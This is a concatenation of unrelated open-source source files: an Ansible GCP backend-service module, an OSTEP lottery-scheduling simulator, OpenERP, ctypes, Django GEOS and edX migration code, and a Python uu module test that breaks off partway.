healthy_threshold: 10
port: 8080
timeout_sec: 2
unhealthy_threshold: 5
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
scopes:
- https://www.googleapis.com/auth/compute
state: present
register: healthcheck
- name: create a backend service
gcp_compute_backend_service:
name: testObject
backends:
- group: "{{ instancegroup }}"
health_checks:
- "{{ healthcheck.selfLink }}"
enable_cdn: true
project: testProject
auth_kind: service_account
service_account_file: /tmp/auth.pem
scopes:
- https://www.googleapis.com/auth/compute
state: present
'''
RETURN = '''
affinity_cookie_ttl_sec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set to
0, the cookie is non-persistent and lasts only until the end of the browser session
(or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: int
backends:
description:
- The list of backends that serve this BackendService.
returned: success
type: complex
contains:
balancing_mode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION. Valid
values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
- This cannot be used for internal load balancing.
returned: success
type: str
capacity_scaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
- This cannot be used for internal load balancing.
returned: success
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
returned: success
type: str
group:
description:
- A reference to InstanceGroup resource.
returned: success
type: dict
max_connections:
description:
- The max number of simultaneous connections for the group. Can be used with either
CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_connections_per_instance:
description:
- The max number of simultaneous connections that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either CONNECTION
or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must be
set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required if RATE
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
returned: success
type: int
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle. This
is used to calculate the capacity of the group. Can be used in either balancing
mode. For RATE mode, either maxRate or maxRatePerInstance must be set.
- This cannot be used for internal load balancing.
returned: success
type: str
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization target
for the group. The default is 0.8. Valid range is [0.0, 1.0].
- This cannot be used for internal load balancing.
returned: success
type: str
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
returned: success
type: complex
contains:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
returned: success
type: complex
contains:
include_host:
description:
- If true requests to different hosts will be cached separately.
returned: success
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
returned: success
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according to query_string_whitelist
and query_string_blacklist. If neither is set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
returned: success
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist or
query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
connection_draining:
description:
- Settings for connection draining.
returned: success
type: complex
contains:
draining_timeout_sec:
description:
- Time for which instance will be drained (not accept new connections, but still work
to finish started).
returned: success
type: int
creation_timestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: bool
health_checks:
description:
- The list of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified instead.
returned: success
type: list
id:
description:
- The unique identifier for the resource.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created. The name
must be 1-63 characters long, and comply with RFC1035. Specifically, the name must
be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following characters
must be a dash, lowercase letter, or digit, except the last character, which cannot
be a dash.
returned: success
type: str
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- Possible values are HTTP, HTTPS, TCP, and SSL. The default is HTTP.
- For internal load balancing, the possible values are TCP and UDP, and the default
is TCP.
returned: success
type: str
region:
description:
- A reference to Region resource.
returned: success
type: str
session_affinity:
description:
- Type of session affinity to use. The default is NONE.
- When the load balancing scheme is EXTERNAL, can be NONE, CLIENT_IP, or GENERATED_COOKIE.
- When the load balancing scheme is INTERNAL, can be NONE, CLIENT_IP, CLIENT_IP_PROTO,
or CLIENT_IP_PORT_PROTO.
- When the protocol is UDP, this field is not used.
returned: success
type: str
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
returned: success
type: int
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
affinity_cookie_ttl_sec=dict(type='int'),
backends=dict(type='list', elements='dict', options=dict(
balancing_mode=dict(type='str', choices=['UTILIZATION', 'RATE', 'CONNECTION']),
capacity_scaler=dict(type='str'),
description=dict(type='str'),
group=dict(type='dict'),
max_connections=dict(type='int'),
max_connections_per_instance=dict(type='int'),
max_rate=dict(type='int'),
max_rate_per_instance=dict(type='str'),
max_utilization=dict(type='str')
)),
cdn_policy=dict(type='dict', options=dict(
cache_key_policy=dict(type='dict', options=dict(
include_host=dict(type='bool'),
include_protocol=dict(type='bool'),
include_query_string=dict(type='bool'),
query_string_blacklist=dict(type='list', elements='str'),
query_string_whitelist=dict(type='list', elements='str')
))
)),
connection_draining=dict(type='dict', options=dict(
draining_timeout_sec=dict(type='int')
)),
description=dict(type='str'),
enable_cdn=dict(type='bool'),
health_checks=dict(type='list', elements='str'),
name=dict(type='str'),
port_name=dict(type='str'),
protocol=dict(type='str', choices=['HTTP', 'HTTPS', 'TCP', 'SSL']),
region=dict(type='str'),
session_affinity=dict(type='str', choices=['NONE', 'CLIENT_IP', 'GENERATED_COOKIE', 'CLIENT_IP_PROTO', 'CLIENT_IP_PORT_PROTO']),
timeout_sec=dict(type='int', aliases=['timeout_seconds'])
)
)
state = module.params['state']
kind = 'compute#backendService'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
fetch = update(module, self_link(module), kind, fetch)
changed = True
else:
delete(module, self_link(module), kind, fetch)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.put(link, resource_to_request(module)))
def delete(module, link, kind, fetch):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#backendService',
u'affinityCookieTtlSec': module.params.get('affinity_cookie_ttl_sec'),
u'backends': BackendServiceBackendArray(module.params.get('backends', []), module).to_request(),
u'cdnPolicy': BackeServiCdnPolic(module.params.get('cdn_policy', {}), module).to_request(),
u'connectionDraining': BackeServiConneDrain(module.params.get('connection_draining', {}), module).to_request(),
u'description': module.params.get('description'),
u'enableCDN': module.params.get('enable_cdn'),
u'healthChecks': module.params.get('health_checks'),
u'name': module.params.get('name'),
u'portName': module.params.get('port_name'),
u'protocol': module.params.get('protocol'),
u'region': region_selflink(module.params.get('region'), module.params),
u'sessionAffinity': module.params.get('session_affinity'),
u'timeoutSec': module.params.get('timeout_sec')
}
return_vals = {}
for k, v in request.items():
if v:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices".format(**module.params)
def return_if_object(module, response, kind):
# If not found, return nothing.
if response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
if result['kind'] != kind:
module.fail_json(msg="Incorrect result: {kind}".format(**result))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'affinityCookieTtlSec': response.get(u'affinityCookieTtlSec'),
u'backends': BackendServiceBackendArray(response.get(u'backends', []), module).from_response(),
u'cdnPolicy': BackeServiCdnPolic(response.get(u'cdnPolicy', {}), module).from_response(),
u'connectionDraining': BackeServiConneDrain(response.get(u'connectionDraining', {}), module).from_response(),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'description': response.get(u'description'),
u'enableCDN': response.get(u'enableCDN'),
u'healthChecks': response.get(u'healthChecks'),
u'id': response.get(u'id'),
u'name': response.get(u'name'),
u'portName': response.get(u'portName'),
u'protocol': response.get(u'protocol'),
u'region': response.get(u'region'),
u'sessionAffinity': response.get(u'sessionAffinity'),
u'timeoutSec': response.get(u'timeoutSec')
}
def region_selflink(name, params):
if name is None:
return
url = r"https://www.googleapis.com/compute/v1/projects/.*/regions/[a-z1-9\-]*"
if not re.match(url, name):
name = "https://www.googleapis.com/compute/v1/projects/{project}/regions/%s".format(**params) % name
return name
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return None
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#backendService')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], 'message')
time.sleep(1.0)
if status not in ['PENDING', 'RUNNING', 'DONE']:
module.fail_json(msg="Invalid result %s" % status)
op_result = fetch_resource(module, op_uri, 'compute#operation')
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class BackendServiceBackendArray(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = []
def to_request(self):
items = []
for item in self.request:
items.append(self._request_for_item(item))
return items
def from_response(self):
items = []
for item in self.request:
items.append(self._response_from_item(item))
return items
def _request_for_item(self, item):
return remove_nones_from_dict({
u'balancingMode': item.get('balancing_mode'),
u'capacityScaler': item.get('capacity_scaler'),
u'description': item.get('description'),
u'group': replace_resource_dict(item.get(u'group', {}), 'selfLink'),
u'maxConnections': item.get('max_connections'),
u'maxConnectionsPerInstance': item.get('max_connections_per_instance'),
u'maxRate': item.get('max_rate'),
u'maxRatePerInstance': item.get('max_rate_per_instance'),
u'maxUtilization': item.get('max_utilization')
})
def _response_from_item(self, item):
return remove_nones_from_dict({
u'balancingMode': item.get(u'balancingMode'),
u'capacityScaler': item.get(u'capacityScaler'),
u'description': item.get(u'description'),
u'group': item.get(u'group'),
u'maxConnections': item.get(u'maxConnections'),
u'maxConnectionsPerInstance': item.get(u'maxConnectionsPerInstance'),
u'maxRate': item.get(u'maxRate'),
u'maxRatePerInstance': item.get(u'maxRatePerInstance'),
u'maxUtilization': item.get(u'maxUtilization')
})
class BackeServiCdnPolic(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'cacheKeyPolicy': BackServCachKeyPoli(self.request.get('cache_key_policy', {}), self.module).to_request()
})
def from_response(self):
return remove_nones_from_dict({
u'cacheKeyPolicy': BackServCachKeyPoli(self.request.get(u'cacheKeyPolicy', {}), self.module).from_response()
})
class BackServCachKeyPoli(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'includeHost': self.request.get('include_host'),
u'includeProtocol': self.request.get('include_protocol'),
u'includeQueryString': self.request.get('include_query_string'),
u'queryStringBlacklist': self.request.get('query_string_blacklist'),
u'queryStringWhitelist': self.request.get('query_string_whitelist')
})
def from_response(self):
return remove_nones_from_dict({
u'includeHost': self.request.get(u'includeHost'),
u'includeProtocol': self.request.get(u'includeProtocol'),
u'includeQueryString': self.request.get(u'includeQueryString'),
u'queryStringBlacklist': self.request.get(u'queryStringBlacklist'),
u'queryStringWhitelist': self.request.get(u'queryStringWhitelist')
})
class BackeServiConneDrain(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({
u'drainingTimeoutSec': self.request.get('draining_timeout_sec')
})
def from_response(self):
return remove_nones_from_dict({
u'drainingTimeoutSec': self.request.get(u'drainingTimeoutSec')
})
if __name__ == '__main__':
main()
|
gpl-3.0
|
ring00/bbl-ucore
|
related_info/ostep/ostep10-lottery.py
|
54
|
3990
|
#! /usr/bin/env python
import sys
from optparse import OptionParser
import random
parser = OptionParser()
parser.add_option('-s', '--seed', default=0, help='the random seed', action='store', type='int', dest='seed')
parser.add_option('-j', '--jobs', default=3, help='number of jobs in the system', action='store', type='int', dest='jobs')
parser.add_option('-l', '--jlist', default='', help='instead of random jobs, provide a comma-separated list of run times and ticket values (e.g., 10:100,20:100 would have two jobs with run-times of 10 and 20, each with 100 tickets)', action='store', type='string', dest='jlist')
parser.add_option('-m', '--maxlen', default=10, help='max length of job', action='store', type='int', dest='maxlen')
parser.add_option('-T', '--maxticket', default=100, help='maximum ticket value, if randomly assigned', action='store', type='int', dest='maxticket')
parser.add_option('-q', '--quantum', default=1, help='length of time slice', action='store', type='int', dest='quantum')
parser.add_option('-c', '--compute', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
random.seed(options.seed)
print 'ARG jlist', options.jlist
print 'ARG jobs', options.jobs
print 'ARG maxlen', options.maxlen
print 'ARG maxticket', options.maxticket
print 'ARG quantum', options.quantum
print 'ARG seed', options.seed
print ''
print 'Here is the job list, with the run time of each job: '
import operator
tickTotal = 0
runTotal = 0
joblist = []
if options.jlist == '':
for jobnum in range(0,options.jobs):
runtime = int(options.maxlen * random.random())
tickets = int(options.maxticket * random.random())
runTotal += runtime
tickTotal += tickets
joblist.append([jobnum, runtime, tickets])
print ' Job %d ( length = %d, tickets = %d )' % (jobnum, runtime, tickets)
else:
jobnum = 0
for entry in options.jlist.split(','):
(runtime, tickets) = entry.split(':')
joblist.append([jobnum, int(runtime), int(tickets)])
runTotal += int(runtime)
tickTotal += int(tickets)
jobnum += 1
for job in joblist:
print ' Job %d ( length = %d, tickets = %d )' % (job[0], job[1], job[2])
print '\n'
if options.solve == False:
print 'Here is the set of random numbers you will need (at most):'
for i in range(runTotal):
r = int(random.random() * 1000001)
print 'Random', r
if options.solve == True:
print '** Solutions **\n'
jobs = len(joblist)
clock = 0
for i in range(runTotal):
r = int(random.random() * 1000001)
winner = int(r % tickTotal)
current = 0
for (job, runtime, tickets) in joblist:
current += tickets
if current > winner:
(wjob, wrun, wtix) = (job, runtime, tickets)
break
print 'Random', r, '-> Winning ticket %d (of %d) -> Run %d' % (winner, tickTotal, wjob)
# print 'Winning ticket %d (of %d) -> Run %d' % (winner, tickTotal, wjob)
print ' Jobs:',
for (job, runtime, tickets) in joblist:
if wjob == job:
wstr = '*'
else:
wstr = ' '
if runtime > 0:
tstr = tickets
else:
tstr = '---'
print ' (%s job:%d timeleft:%d tix:%s ) ' % (wstr, job, runtime, tstr),
print ''
# now do the accounting
if wrun >= options.quantum:
wrun -= options.quantum
else:
wrun = 0
clock += options.quantum
# job completed!
if wrun == 0:
print '--> JOB %d DONE at time %d' % (wjob, clock)
tickTotal -= wtix
wtix = 0
jobs -= 1
# update job list
joblist[wjob] = (wjob, wrun, wtix)
if jobs == 0:
print ''
break
|
gpl-2.0
|
colinligertwood/odoo
|
openerp/report/render/rml2txt/__init__.py
|
381
|
1351
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from rml2txt import parseString, parseNode
""" This engine is the minimalistic renderer of RML documents into text files,
using spaces and newlines to format.
It was needed in some special applications, where legal reports need to be
printed in special (dot-matrix) printers.
"""
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
orangeduck/PyAutoC
|
Python27/Lib/ctypes/test/test_array_in_pointer.py
|
117
|
1729
|
import unittest
from ctypes import *
from binascii import hexlify
import re
def dump(obj):
# helper function to dump memory contents in hex, with a hyphen
# between the bytes.
h = hexlify(memoryview(obj))
return re.sub(r"(..)", r"\1-", h)[:-1]
class Value(Structure):
_fields_ = [("val", c_byte)]
class Container(Structure):
_fields_ = [("pvalues", POINTER(Value))]
class Test(unittest.TestCase):
def test(self):
# create an array of 4 values
val_array = (Value * 4)()
# create a container, which holds a pointer to the pvalues array.
c = Container()
c.pvalues = val_array
# memory contains 4 NUL bytes now, that's correct
self.assertEqual("00-00-00-00", dump(val_array))
# set the values of the array through the pointer:
for i in range(4):
c.pvalues[i].val = i + 1
values = [c.pvalues[i].val for i in range(4)]
# These are the expected results: here s the bug!
self.assertEqual(
(values, dump(val_array)),
([1, 2, 3, 4], "01-02-03-04")
)
def test_2(self):
val_array = (Value * 4)()
# memory contains 4 NUL bytes now, that's correct
self.assertEqual("00-00-00-00", dump(val_array))
ptr = cast(val_array, POINTER(Value))
# set the values of the array through the pointer:
for i in range(4):
ptr[i].val = i + 1
values = [ptr[i].val for i in range(4)]
# These are the expected results: here s the bug!
self.assertEqual(
(values, dump(val_array)),
([1, 2, 3, 4], "01-02-03-04")
)
if __name__ == "__main__":
unittest.main()
|
bsd-2-clause
|
riteshshrv/django
|
django/contrib/gis/geos/prototypes/geom.py
|
288
|
4069
|
from ctypes import POINTER, c_char_p, c_int, c_size_t, c_ubyte
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_sized_string, check_string, check_zero,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
pass
# ### ctypes factory classes ###
class BinConstructor(GEOSFuncFactory):
"Generates a prototype for binary construction (HEX, WKB) GEOS routines."
argtypes = [c_char_p, c_size_t]
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
# HEX & WKB output
class BinOutput(GEOSFuncFactory):
"Generates a prototype for the routines that return a sized string."
argtypes = [GEOM_PTR, POINTER(c_size_t)]
restype = c_uchar_p
errcheck = staticmethod(check_sized_string)
class GeomOutput(GEOSFuncFactory):
"For GEOS routines that return a geometry."
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
def get_func(self, argtypes):
self.argtypes = argtypes
return super(GeomOutput, self).get_func()
class IntFromGeom(GEOSFuncFactory):
"Argument is a geometry, return type is an integer."
argtypes = [GEOM_PTR]
restype = c_int
def get_func(self, zero=False):
if zero:
self.errcheck = check_zero
else:
self.errcheck = check_minus_one
return super(IntFromGeom, self).get_func()
class StringFromGeom(GEOSFuncFactory):
"Argument is a Geometry, return type is a string."
argtypes = [GEOM_PTR]
restype = geos_char_p
errcheck = staticmethod(check_string)
# ### ctypes prototypes ###
# Deprecated creation routines from WKB, HEX, WKT
from_hex = BinConstructor('GEOSGeomFromHEX_buf')
from_wkb = BinConstructor('GEOSGeomFromWKB_buf')
from_wkt = GeomOutput('GEOSGeomFromWKT', [c_char_p])
# Deprecated output routines
to_hex = BinOutput('GEOSGeomToHEX_buf')
to_wkb = BinOutput('GEOSGeomToWKB_buf')
to_wkt = StringFromGeom('GEOSGeomToWKT')
# The GEOS geometry type, typeid, num_coordites and number of geometries
geos_normalize = IntFromGeom('GEOSNormalize')
geos_type = StringFromGeom('GEOSGeomType')
geos_typeid = IntFromGeom('GEOSGeomTypeId')
get_dims = IntFromGeom('GEOSGeom_getDimensions', zero=True)
get_num_coords = IntFromGeom('GEOSGetNumCoordinates')
get_num_geoms = IntFromGeom('GEOSGetNumGeometries')
# Geometry creation factories
create_point = GeomOutput('GEOSGeom_createPoint', [CS_PTR])
create_linestring = GeomOutput('GEOSGeom_createLineString', [CS_PTR])
create_linearring = GeomOutput('GEOSGeom_createLinearRing', [CS_PTR])
# Polygon and collection creation routines are special and will not
# have their argument types defined.
create_polygon = GeomOutput('GEOSGeom_createPolygon', None)
create_collection = GeomOutput('GEOSGeom_createCollection', None)
# Ring routines
get_extring = GeomOutput('GEOSGetExteriorRing', [GEOM_PTR])
get_intring = GeomOutput('GEOSGetInteriorRingN', [GEOM_PTR, c_int])
get_nrings = IntFromGeom('GEOSGetNumInteriorRings')
# Collection Routines
get_geomn = GeomOutput('GEOSGetGeometryN', [GEOM_PTR, c_int])
# Cloning
geom_clone = GEOSFuncFactory('GEOSGeom_clone', argtypes=[GEOM_PTR], restype=GEOM_PTR)
# Destruction routine.
destroy_geom = GEOSFuncFactory('GEOSGeom_destroy', argtypes=[GEOM_PTR])
# SRID routines
geos_get_srid = GEOSFuncFactory('GEOSGetSRID', argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory('GEOSSetSRID', argtypes=[GEOM_PTR, c_int])
|
bsd-3-clause
|
sbalde/edxplatform
|
openedx/core/djangoapps/content/course_overviews/migrations/0006_add_version_and_timestamp.py
|
56
|
4600
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseOverview.created'
db.add_column('course_overviews_courseoverview', 'created',
self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CourseOverview.modified'
db.add_column('course_overviews_courseoverview', 'modified',
self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CourseOverview.version'
db.add_column('course_overviews_courseoverview', 'version',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseOverview.created'
db.delete_column('course_overviews_courseoverview', 'created')
# Deleting field 'CourseOverview.modified'
db.delete_column('course_overviews_courseoverview', 'modified')
# Deleting field 'CourseOverview.version'
db.delete_column('course_overviews_courseoverview', 'version')
models = {
'course_overviews.courseoverview': {
'Meta': {'object_name': 'CourseOverview'},
'_location': ('xmodule_django.models.UsageKeyField', [], {'max_length': '255'}),
'_pre_requisite_courses_json': ('django.db.models.fields.TextField', [], {}),
'advertised_start': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'cert_html_view_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cert_name_long': ('django.db.models.fields.TextField', [], {}),
'cert_name_short': ('django.db.models.fields.TextField', [], {}),
'certificates_display_behavior': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'certificates_show_before_end': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_image_url': ('django.db.models.fields.TextField', [], {}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'days_early_for_beta': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'display_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'display_number_with_default': ('django.db.models.fields.TextField', [], {}),
'display_org_with_default': ('django.db.models.fields.TextField', [], {}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'end_of_course_survey_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'enrollment_domain': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'enrollment_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'enrollment_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'facebook_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'has_any_active_web_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'primary_key': 'True', 'db_index': 'True'}),
'invitation_only': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lowest_passing_grade': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'max_student_enrollments_allowed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'mobile_available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'social_sharing_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'version': ('django.db.models.fields.IntegerField', [], {}),
'visible_to_staff_only': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
}
}
complete_apps = ['course_overviews']
|
agpl-3.0
|
dd00/commandergenius
|
project/jni/python/src/Lib/test/test_uu.py
|
61
|
5316
|
"""
Tests for uu module.
Nick Mathewson
"""
import unittest
from test import test_support
import sys, os, uu, cStringIO
import uu
plaintext = "The smooth-scaled python crept over the sleeping dog\n"
encodedtext = """\
M5&AE('-M;V]T:\"US8V%L960@<'ET:&]N(&-R97!T(&]V97(@=&AE('-L965P
(:6YG(&1O9PH """
encodedtextwrapped = "begin %03o %s\n" + encodedtext.replace("%", "%%") + "\n \nend\n"
class UUTest(unittest.TestCase):
def test_encode(self):
inp = cStringIO.StringIO(plaintext)
out = cStringIO.StringIO()
uu.encode(inp, out, "t1")
self.assertEqual(out.getvalue(), encodedtextwrapped % (0666, "t1"))
inp = cStringIO.StringIO(plaintext)
out = cStringIO.StringIO()
uu.encode(inp, out, "t1", 0644)
self.assertEqual(out.getvalue(), encodedtextwrapped % (0644, "t1"))
def test_decode(self):
inp = cStringIO.StringIO(encodedtextwrapped % (0666, "t1"))
out = cStringIO.StringIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
inp = cStringIO.StringIO(
"UUencoded files may contain many lines,\n" +
"even some that have 'begin' in them.\n" +
encodedtextwrapped % (0666, "t1")
)
out = cStringIO.StringIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
def test_truncatedinput(self):
inp = cStringIO.StringIO("begin 644 t1\n" + encodedtext)
out = cStringIO.StringIO()
try:
uu.decode(inp, out)
self.fail("No exception thrown")
except uu.Error, e:
self.assertEqual(str(e), "Truncated input file")
def test_missingbegin(self):
inp = cStringIO.StringIO("")
out = cStringIO.StringIO()
try:
uu.decode(inp, out)
self.fail("No exception thrown")
except uu.Error, e:
self.assertEqual(str(e), "No valid begin line found in input file")
class UUStdIOTest(unittest.TestCase):
def setUp(self):
self.stdin = sys.stdin
self.stdout = sys.stdout
def tearDown(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def test_encode(self):
sys.stdin = cStringIO.StringIO(plaintext)
sys.stdout = cStringIO.StringIO()
uu.encode("-", "-", "t1", 0666)
self.assertEqual(
sys.stdout.getvalue(),
encodedtextwrapped % (0666, "t1")
)
def test_decode(self):
sys.stdin = cStringIO.StringIO(encodedtextwrapped % (0666, "t1"))
